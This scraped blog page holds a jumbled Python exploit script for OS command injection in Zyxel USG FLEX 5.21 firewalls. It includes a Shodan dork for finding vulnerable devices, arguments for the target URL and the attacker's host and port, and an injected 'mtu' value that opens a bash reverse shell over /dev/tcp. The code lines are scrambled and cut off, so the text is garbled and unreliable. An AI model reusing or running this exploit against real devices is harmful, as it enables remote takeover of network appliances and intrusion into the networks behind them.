onthegoakp.blogg.se

Print(" Can't exploit the target ! Code :", response.status_code) Url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5Įxcept (KeyboardInterrupt, ): "mtu": f' bash -c "exec bash -i &>/dev/tcp/") "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp" "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n" "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg" "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8" "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg" "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg" "ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7" Parser.add_argument("-p", dest="port", help="Specify Remote port") Parser.add_argument("-r", dest="host", help="Specify Remote host") Parser.add_argument("-u", dest="url", help="Specify target URL") # Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"įrom import InsecureRequestWarningĭescription="Example : python3 %(prog)s -u -r 127.0.0.1 -p 4444", # Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection